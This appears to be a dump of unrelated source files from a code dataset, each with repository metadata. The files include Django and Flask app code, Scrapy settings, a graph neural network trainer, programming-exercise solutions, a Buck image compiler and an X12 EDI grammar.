#dl = create_style_test_dataset(32)
#xz_test(dl, 1,net, DEVICE)
#test_model(net, dl)
test_model_genera(net, dl, dl_teacher)
#l1_for_without_smooth(net, dl, DEVICE)
#l1_for_with_smooth(net, dl, DEVICE)
#get_result(net, dl, DEVICE, net_name)
| [
"[email protected]"
] | |
c5d9cf121b69761030d0050d73f56d251f3b3b8d | a57eb85856cc93a389b815276765a06019d6f8d4 | /manage.py | a187e1a5e09bc71ad51ec80483e4c11d9cced0d9 | [
"MIT"
] | permissive | astrofrog/multistatus | 205f6ad9a06995bc4b418f6d0de222c4dacfcb79 | f63042c9e85cb4e58e3768a65f4684be07e432d1 | refs/heads/master | 2021-01-10T21:05:40.370555 | 2014-12-09T10:24:48 | 2014-12-09T10:24:48 | 22,805,918 | 0 | 1 | null | 2014-12-09T10:23:13 | 2014-08-10T09:39:38 | Python | UTF-8 | Python | false | false | 257 | py | #!/usr/bin/env python3.4
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "multistatus.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
10d541866288a328b07bc1a9602e1afcbb87583f | 994461efa08e71403b2a1c0598391fddf3b44b87 | /june-leetcoding-challenge/d5-random-pick-with-weight.py | 65d47a61d6766e106ff6b66178910de5a81e3489 | [] | no_license | pkdism/leetcode | 26f16f9211ddfdef8e0fe74c9268e6a48da64717 | 589652ae727331d1f962d22a020fc6ae09bfcea4 | refs/heads/master | 2020-12-11T15:48:01.116731 | 2020-08-16T18:31:03 | 2020-08-16T18:31:03 | 233,889,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | """
Given an array w of positive integers,
where w[i] describes the weight of index i,
write a function pickIndex which randomly picks an index in proportion to its weight.
"""
import random
class Solution:
def __init__(self, w: List[int]):
self.w = w
self.n = len(self.w)
self.arr = []
self.curr = 0
for x in w:
self.curr += x
self.arr.append(self.curr)
def pickIndex(self) -> int:
# print(self.arr)
n = len(self.arr)
r = random.randrange(1, self.arr[-1] + 1)
l = 0
h = n-1
while l < h:
m = (l+h)//2
# if self.arr[m] == r:
# return m
if self.arr[m] < r:
l = m + 1
else:
h = m
return l
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex() | [
"[email protected]"
] | |
488eedf2868298347e8fd761a86a7501687b5a22 | cc6e8b20a64940f2ad83be6a03134e8b105514e7 | /webviz/viz/migrations/0001_initial.py | 71fcb033e7e32232e310b0dfc022cfe73f08c521 | [
"MIT"
] | permissive | JagritiG/django-webviz | 50654c4fe76b1653f64e404c45d674d5d179e236 | 213489bb3a70019ca9cff5d127fd6d0c06bc61d6 | refs/heads/main | 2023-04-27T01:21:04.195996 | 2021-05-16T22:30:04 | 2021-05-16T22:30:04 | 353,126,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | # Generated by Django 3.1.7 on 2021-03-30 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Csv',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('csv', models.FileField(upload_to='media/csvs/')),
],
),
]
| [
"[email protected]"
] | |
f197241de30622889b167ecb7dc068406820dbc8 | 6061ebee9fbce8eb5b48ed7ccd2aecb196156598 | /modulo07-funcoes/exercicios/exercicio04.py | 5ebbfcd3edf545e7ffdc636929ca0276708ef06c | [] | no_license | DarioCampagnaCoutinho/logica-programacao-python | fdc64871849bea5f5bbf2c342db5fda15778110b | b494bb6ef226c89f4bcfc66f964987046aba692d | refs/heads/master | 2023-02-24T11:45:29.551278 | 2021-01-26T22:02:49 | 2021-01-26T22:02:49 | 271,899,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | def aumento(numero, valor):
resultado = numero * valor / 100
return resultado + numero
resultado = aumento(100, 50)
print(resultado) | [
"[email protected]"
] | |
b936c098695eb03ec4c9abb82e78537b33edc5f3 | b7a2a80843fa5141ffb9c7b4439f1d2ac713af30 | /UT2_Morsen.py | f0f71ad6765a17297467d402ad1566da64d52c4e | [] | no_license | wunnox/python_grundlagen | df1bc2b9b1b561bd6733ccc25305e799a48e714e | fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0 | refs/heads/master | 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 | Python | UTF-8 | Python | false | false | 450 | py | #!/usr/local/bin/python3
####################################################
#
# Uebung UT2_Morsen.py:
# Erstellen Sie ein Programm, welches anhand einer
# Morsetabelle einen Text in Morsecode ausgibt.
# Verwenden Sie hierzu das Modul UT2_Morsecodes.py
#
####################################################
import UT2_Morsecodes as mc
w = input('-> ') # Wort einlesen
w = w.replace(' ', '_')
for l in w:
print(mc.morse(l), end=' ')
print()
| [
"[email protected]"
] | |
1c3ea9c37220f04f5ec059b8d964947f7d2508f6 | c31e69b763e1b52d3cefa4f5a49432ae966f22d0 | /day29/mySpider/mySpider/settings.py | 4e3e3faf4c4eeff43f7ccf6f99bfd3381a22506f | [] | no_license | lvah/201901python | cbda174a3c97bc5a2f732c8e16fc7cf8451522d2 | 7bffe04a846f2df6344141f576820730a7bbfa6a | refs/heads/master | 2022-12-13T09:49:29.631719 | 2019-04-06T09:48:33 | 2019-04-06T09:48:33 | 165,477,671 | 3 | 0 | null | 2022-12-08T04:57:01 | 2019-01-13T07:23:44 | HTML | UTF-8 | Python | false | false | 3,413 | py | # -*- coding: utf-8 -*-
# Scrapy settings for mySpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'mySpider'
SPIDER_MODULES = ['mySpider.spiders']
NEWSPIDER_MODULE = 'mySpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'mySpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
MOOCFilename = "mooc.txt"
ITEM_PIPELINES = {
# 管道的位置: 优先级, 0~1000, 数字越小, 优先级越高;
'mySpider.pipelines.MyspiderPipeline': 300,
'mySpider.pipelines.CsvPipeline': 400,
'mySpider.pipelines.MysqlPipeline': 500,
'mySpider.pipelines.ImagePipeline': 200,
}
IMAGES_STORE = '/root/PycharmProjects/day29/mySpider/img'
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"[email protected]"
] | |
f8bf11e12bc1581ed30ac99f941e2bf0f33f766b | 80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019 | /data/HackerRank-ProblemSolving/Counting Valleys.py | 8dd7bd82fe261f99bf7584a8856d457b1d55009b | [] | no_license | Ritvik19/CodeBook | ef7764d89b790e902ede5802f36d5ca910d8a50e | 2b4ed7938bbf156553d6ba5cba6216449528f0fc | refs/heads/master | 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | #!/bin/python3
import math
import os
import random
import re
import sys
def countingValleys(n, s):
count = 0
topography = 0
for _ in s:
if _ == 'D':
topography -= 1
else:
topography += 1
if topography == 0:
count += 1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
s = input()
result = countingValleys(n, s)
fptr.write(str(result) + '\n')
fptr.close()
| [
"[email protected]"
] | |
ffd754dfcd3f8ce81ed63d9d1957b3c012840687 | f63d8037abd95550bbf19820bbbf63fe004ea027 | /apps/auth/models.py | e887c3348f0f68c9ec65dc5781584c4c4638ab2f | [] | no_license | lsdlab/flask_socketio_celery | 6595e0fdc6534e4c3988b2e895194ba6f2302c53 | 84870110641feb8e49d9f45271894a66e202b7ec | refs/heads/master | 2020-03-24T20:54:47.793077 | 2018-08-01T04:33:54 | 2018-08-01T04:33:54 | 143,003,268 | 0 | 1 | null | 2018-08-24T01:54:32 | 2018-07-31T11:08:36 | Python | UTF-8 | Python | false | false | 2,521 | py | import datetime as dt
from flask_login import UserMixin
from apps.database import (Column, Model, SurrogatePK, db,
reference_col, relationship)
from apps.extensions import bcrypt
class Role(SurrogatePK, Model):
"""A role for a user."""
__tablename__ = 'auth_roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('auth_users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""A user of the app."""
__tablename__ = 'auth_users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(db.DateTime, nullable=False, default=dt.datetime.now)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
sid = Column(db.String(80), nullable=True, default='')
def __init__(self, username, password=None, **kwargs):
"""Create instance."""
db.Model.__init__(self, username=username, **kwargs)
if password:
self.set_password(password)
else:
self.password = None
def set_password(self, password):
"""Set password."""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""Check password."""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full user name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
def to_json(self):
return {
'id': self.id,
'username': self.username,
'email': self.email,
'active': self.active,
'is_admin': self.is_admin,
'sid': self.sid,
'created_at': self.created_at.strftime("%Y-%m-%d %H:%M:%S")
}
| [
"[email protected]"
] | |
89588f1507285e3312add597434439152e7280fa | 7a3696072a511acc4974bb76004b315a35a106b7 | /SS-GCNs/SS-GMNN-GraphMix/GraphMix-clu/trainer.py | 0a339f94160ac998022247c886c38f0cec71a1bd | [
"MIT"
] | permissive | xyh97/graph_representation | 859e9f2ff911058db251fd6547098968960c6739 | e6967073a951cd029651389d4b76606f9cef7f6c | refs/heads/main | 2023-03-23T00:55:52.763740 | 2021-03-19T17:15:40 | 2021-03-19T17:15:40 | 343,223,074 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,909 | py | import math
import random
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
from torch.optim import Optimizer
bce_loss = nn.BCELoss().cuda()
softmax = nn.Softmax(dim=1).cuda()
class_criterion = nn.CrossEntropyLoss().cuda()
def mixup_criterion(y_a, y_b, lam):
return lambda criterion, pred: lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
def get_optimizer(name, parameters, lr, weight_decay=0):
if name == 'sgd':
return torch.optim.SGD(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'rmsprop':
return torch.optim.RMSprop(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adagrad':
return torch.optim.Adagrad(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adam':
return torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adamax':
return torch.optim.Adamax(parameters, lr=lr, weight_decay=weight_decay)
else:
raise Exception("Unsupported optimizer: {}".format(name))
def change_lr(optimizer, new_lr):
for param_group in optimizer.param_groups:
param_group['lr'] = new_lr
class Trainer(object):
def __init__(self, opt, model, partition_labels, ema= True):
partition_num = partition_labels.max() + 1
self.partition_labels = partition_labels.cuda()
self.task_ratio = opt['task_ratio']
self.loss_func = nn.CrossEntropyLoss()
self.opt = opt
self.ema = ema
self.model = model
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
self.ss_classifier = nn.Linear(opt['hidden_dim'], partition_num, bias=False)
if opt['cuda']:
self.criterion.cuda()
self.ss_classifier.cuda()
self.parameters.append(self.ss_classifier.weight)
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def reset(self):
self.model.reset()
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def update(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.train()
self.optimizer.zero_grad()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
loss.backward()
self.optimizer.step()
return loss.item()
def update_soft(self, inputs, target, idx, idx_u):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
logits= self.model(inputs)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
return loss, loss0
def update_soft_aux(self, inputs, target,target_discrete, idx, idx_unlabeled, adj, opt, mixup_layer, idx_u):
"""uses the auxiliary loss as well, which does not use the adjacency information"""
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
idx_unlabeled = idx_unlabeled.cuda()
self.model.train()
self.optimizer.zero_grad()
mixup = True
if mixup == True:
# get the supervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix=mixup_layer)
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
mixed_target = lam*target_a + (1-lam)*target_b
loss = bce_loss(softmax(logits[idx]), mixed_target)
# get the unsupervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx_unlabeled, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix= mixup_layer)
mixed_target = lam*target_a + (1-lam)*target_b
loss_usup = bce_loss(softmax(logits[idx_unlabeled]), mixed_target)
else:
logits = self.model.forward_aux(inputs, target=None, train_idx= idx, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
'''
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0, self.partition_labels)
'''
logits = self.model.forward_aux(inputs, target=None, train_idx= idx_unlabeled, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss_usup = -torch.mean(torch.sum(target[idx_unlabeled] * logits[idx_unlabeled], dim=-1))
return loss, loss_usup, loss0
def evaluate(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.eval()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
preds = torch.max(logits[idx], dim=1)[1]
correct = preds.eq(target[idx]).double()
accuracy = correct.sum() / idx.size(0)
return loss.item(), preds, accuracy.item()
def predict(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def save(self, filename):
params = {
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()
}
try:
torch.save(params, filename)
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.optimizer.load_state_dict(checkpoint['optim'])
| [
"[email protected]"
] | |
fa3e535aaacaa3dafcb031f0333a8778da9d2e30 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_97/1531.py | 9246536e333923658ae3a6c8448940cb36f0d831 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | def check(x, mn, mx):
global pairs
pcheck = []
x = str(x)
if len(x) == 1:
pass
if len(x) == 2:
if x[0] != x[1]:
first = x[::-1]
if int(first) > int(x):
pcheck.append(int(first))
if len(x) == 3:
second = x[1:]+x[0]
third = x[-1]+x[0:-1]
if second != x and second[0] != '0' and int(second) > int(x):
pcheck.append(int(second))
if third != x and third[0] != '0' and int(third) > int(x):
pcheck.append(int(third))
for item in pcheck:
if item >= mn and item <= mx:
pairs += 1
def recycle(numbers):
global pairs
pairs = 0
parameters = numbers.split()
for x in range(int(parameters[0]), int(parameters[1])+1):
check(x,int(parameters[0]),int(parameters[1]))
testcases.append(pairs)
testcases = []
pairs = 0
f = file('C-small-attempt2.in', 'r')
for line in f:
if len(line.split()) > 1:
recycle(line)
f.close()
f1 = file('outputC.txt', 'w')
for x in range(1, len(testcases)+1):
f1.write("Case #"+str(x)+": "+str(testcases[x-1])+'\n')
f1.close()
| [
"[email protected]"
] | |
d44c38b442f4ea146ddaa3080d9f72ed2c617fa8 | 025c1cc826722d558d43854f3e319917e199d609 | /infra_macros/macro_lib/convert/container_image/compiler/compiler.py | 6cfddefcce8817aa2d14a9321c253ab846c2820a | [
"BSD-3-Clause"
] | permissive | martarozek/buckit | 73440be29a2ce64084016fc395a5a8cc9bc1e602 | 343cc5a5964c1d43902b6a77868652adaefa0caa | refs/heads/master | 2020-03-26T06:07:35.468491 | 2018-08-12T17:34:04 | 2018-08-12T17:45:46 | 144,590,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,345 | py | #!/usr/bin/env python3
'''
This is normally invoked by the `image_layer` Buck macro converter.
This compiler builds a btrfs subvolume in
<--subvolumes-dir>/<--subvolume-name>:<subvolume-version>
To do so, it parses `--child-feature-json` and the `--child-dependencies`
that referred therein, creates `ImageItems`, sorts them in dependency order,
and invokes `.build()` to apply each item to actually construct the subvol.
'''
import argparse
import itertools
import os
import subprocess
import sys
from subvol_utils import Subvol
from .dep_graph import dependency_order_items
from .items import gen_parent_layer_items
from .items_for_features import gen_items_for_features
from .subvolume_on_disk import SubvolumeOnDisk
# At the moment, the target names emitted by `image_feature` targets seem to
# be normalized the same way as those provided to us by `image_layer`. If
# this were to ever change, this would be a good place to re-normalize them.
def make_target_filename_map(targets_followed_by_filenames):
'Buck query_targets_and_outputs gives us `//target path/to/target/out`'
if len(targets_followed_by_filenames) % 2 != 0:
raise RuntimeError(
f'Odd-length --child-dependencies {targets_followed_by_filenames}'
)
it = iter(targets_followed_by_filenames)
d = dict(zip(it, it))
# A hacky check to ensures that the target corresponds to the path. We
# can remove this if we absolutely trust the Buck output.
if not all(
t.replace('//', '/').replace(':', '/') in f for t, f in d.items()
):
raise RuntimeError(f'Not every target matches its output: {d}')
return d
def parse_args(args):
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'--subvolumes-dir', required=True,
help='A directory on a btrfs volume to store the compiled subvolume '
'representing the new layer',
)
parser.add_argument(
'--subvolume-name', required=True,
help='The first part of the subvolume directory name',
)
parser.add_argument(
'--subvolume-version', required=True,
help='The second part of the subvolume directory name',
)
parser.add_argument(
'--parent-layer-json',
help='Path to the JSON output of the parent `image_layer` target',
)
parser.add_argument(
'--child-layer-target', required=True,
help='The name of the Buck target describing the layer being built',
)
parser.add_argument(
'--child-feature-json', required=True,
help='The path of the JSON output of the `image_feature` that was '
'auto-generated for the layer being built',
)
parser.add_argument(
'--child-dependencies',
nargs=argparse.REMAINDER, metavar=['TARGET', 'PATH'], default=(),
help='Consumes the remaining arguments on the command-line, with '
'arguments at positions 1, 3, 5, 7, ... used as Buck target names '
'(to be matched with the targets in per-feature JSON outputs). '
'The argument immediately following each target name must be a '
'path to the output of that target on disk.',
)
return parser.parse_args(args)
def build_image(args):
subvol = Subvol(os.path.join(
args.subvolumes_dir,
f'{args.subvolume_name}:{args.subvolume_version}',
))
for item in dependency_order_items(
itertools.chain(
gen_parent_layer_items(
args.child_layer_target,
args.parent_layer_json,
args.subvolumes_dir,
),
gen_items_for_features(
[args.child_feature_json],
make_target_filename_map(args.child_dependencies),
),
)
):
item.build(subvol)
try:
return SubvolumeOnDisk.from_subvolume_path(
subvol.path().decode(),
args.subvolumes_dir,
args.subvolume_name,
args.subvolume_version,
)
except Exception as ex:
raise RuntimeError(f'Serializing subvolume {subvol.path()}') from ex
if __name__ == '__main__': # pragma: no cover
build_image(parse_args(sys.argv[1:])).to_json_file(sys.stdout)
| [
"[email protected]"
] | |
3de5136de3696c4e49370d8ef3420a67e721f6b3 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_149/82.py | 0c7ae5570829193e068ba4471f6d4bad7fb4b56a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | #!/usr/bin/env python
import itertools
def solve(a):
ans=0
while a:
x=min(a)
i=a.index(x)
del a[i]
ans+=min(i,len(a)-i)
return ans
for t in xrange(1,1+int(raw_input())):
n=int(raw_input())
a=map(int,raw_input().split())
ans=solve(a)
print"Case #%d:"%t,
print ans
| [
"[email protected]"
] | |
8cfbe05b9aeb068e2eea79df986d823110f9c019 | 899bac17acf97252a33d91af076ff1f16b975210 | /eduiddashboard/scripts/decode_session.py | 787b570f274e635d56156b7461f3b6945ebfead4 | [] | no_license | isabella232/eduid-dashboard | 91a209f7833f26a7949cecec60df2e501a82f840 | 99cffaa90f41b13ec34f9d057f19630c644df6ee | refs/heads/master | 2023-03-16T05:19:36.184687 | 2018-07-27T12:27:53 | 2018-07-27T12:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,090 | py | # -*- coding: utf-8 -*-
import sys
import pprint
from pyramid.paster import bootstrap
from eduid_common.session.session import SessionManager
import logging
logger = logging.getLogger(__name__)
__author__ = 'ft'
"""
Read and decode a session from Redis. Supply the token (id starting with lower-case 'a')
from an existing session.
"""
default_config_file = '/opt/eduid/eduid-dashboard/etc/eduid-dashboard.ini'
def main(token):
env = bootstrap(default_config_file)
settings = env['request'].registry.settings
secret = settings.get('session.secret')
manager = SessionManager(cfg = settings, ttl = 3600, secret = secret)
session = manager.get_session(token = token)
print('Session: {}'.format(session))
print('Data:\n{}'.format(pprint.pformat(dict(session))))
return True
if __name__ == '__main__':
try:
if len(sys.argv) != 2:
print('Syntax: decode_session.py aTOKEN')
sys.exit(1)
res = main(sys.argv[1])
if res:
sys.exit(0)
sys.exit(1)
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
ea2f5c0278cf81ce6a961011b597677d80605caa | c6588d0e7d361dba019743cacfde83f65fbf26b8 | /x12/5030/240005030.py | e169346e38e95704c267b8fa6401b8abee37c150 | [] | no_license | djfurman/bots-grammars | 64d3b3a3cd3bd95d625a82204c3d89db6934947c | a88a02355aa4ca900a7b527b16a1b0f78fbc220c | refs/heads/master | 2021-01-12T06:59:53.488468 | 2016-12-19T18:37:57 | 2016-12-19T18:37:57 | 76,887,027 | 0 | 0 | null | 2016-12-19T18:30:43 | 2016-12-19T18:30:43 | null | UTF-8 | Python | false | false | 1,585 | py | from bots.botsconfig import *
from records005030 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'MZ',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'LX', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'NTE', MIN: 0, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
{ID: 'L11', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'MS2', MIN: 0, MAX: 99999},
{ID: 'LS', MIN: 0, MAX: 1, LEVEL: [
{ID: 'MAN', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'L11', MIN: 0, MAX: 99999},
{ID: 'AT7', MIN: 0, MAX: 99999},
{ID: 'CD3', MIN: 0, MAX: 99999},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'Q7', MIN: 0, MAX: 99999},
]},
{ID: 'LE', MIN: 1, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
c70a779cc10fd3ba3fe7aca2d9736f9bcb91c53f | d594f3926f6379ef7c382c608cb211f507240420 | /csunplugged/tests/utils/errors/test_ThumbnailPageNotFoundError.py | b73009b6a4421c213fecea7a8dec041baac543c4 | [
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | uccser/cs-unplugged | 0b9151f84dd490d5b90771a3706327a623d39edc | 363e281ff17cefdef0ec61078b1718eef2eaf71a | refs/heads/develop | 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 | MIT | 2023-09-14T02:15:40 | 2016-08-22T23:16:40 | Python | UTF-8 | Python | false | false | 958 | py | """Test class for ThumbnailPageNotFoundError error."""
from django.test import SimpleTestCase
from utils.errors.ThumbnailPageNotFoundError import ThumbnailPageNotFoundError
from unittest.mock import Mock
